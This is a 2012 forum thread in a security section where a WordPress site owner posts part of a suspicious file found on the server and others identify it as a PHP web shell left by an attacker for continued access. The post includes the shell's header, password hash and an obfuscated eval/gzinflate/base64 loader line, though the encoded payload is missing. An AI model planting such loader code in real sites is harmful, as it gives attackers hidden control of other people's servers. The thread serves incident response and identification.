1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

Zend_Ion_Index.Php in Server (wordpress)

Discussion in 'Security' started by Nystul, Feb 7, 2012.

  1. #1
    I checked my wordpress servers daily ..
    found this newly updated file
    Zend_Ion_index.php , deleted it ..

    just wondering, what does this do ? So that i can further check if my files are infected.
    I changed my ftp password, did a scan on the pc already.
    SEMrush
    i found several other sites online infected with this too .. seems like open a password code thing to change the files on the server ?

    <?PHP # Web Shell by oRb
    $auth_pass = "439b9c85f0bc1db31c288d84a04fdb8a";
    $color = "#df5";
    $default_use_ajax = true;
    $default_charset = 'Windows-1251';
    $o = 
     
    ;eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28\x24\x6F\x29\x29\x29\x3B"); 
    ?>
    
    Code (markup):
     
    Nystul, Feb 7, 2012 IP
    SEMrush
  2. HostingLynx

    HostingLynx Active Member

    Messages:
    106
    Likes Received:
    1
    Best Answers:
    1
    Trophy Points:
    83
    Articles:
    10
    #2
    That is a PHP based "shell". It allows a hacker to have access to your files and the server your website is hosted on. Generally people put up a "shell" so that if you fix the original way they hacked your website they will still have access so they can gain access in the future. It appears that they have encoded the actual code for the shell as to avoid server anti viruses. Smart move removing that. You should check your logs and figure out how it got there in the first place to avoid it happening again, you also might want to change your administrator password.
     
    HostingLynx, Feb 7, 2012 IP
  3. tRiTiO

    tRiTiO Peon

    Messages:
    1
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #3
    Hello:

    I found the same file in my server "Zend_Ion_Index.Php" the account with this file is empty, not related to Wordpress installation. If you search in google for this file appears a lot of sites compromised..

    I don't know the vulnerability yet. Maybe PHP 5.3.9, because the file is created before an update to 5.3.10...

    Please, if you have more information post it.

    Thanks you very much.
     
    tRiTiO, Feb 10, 2012 IP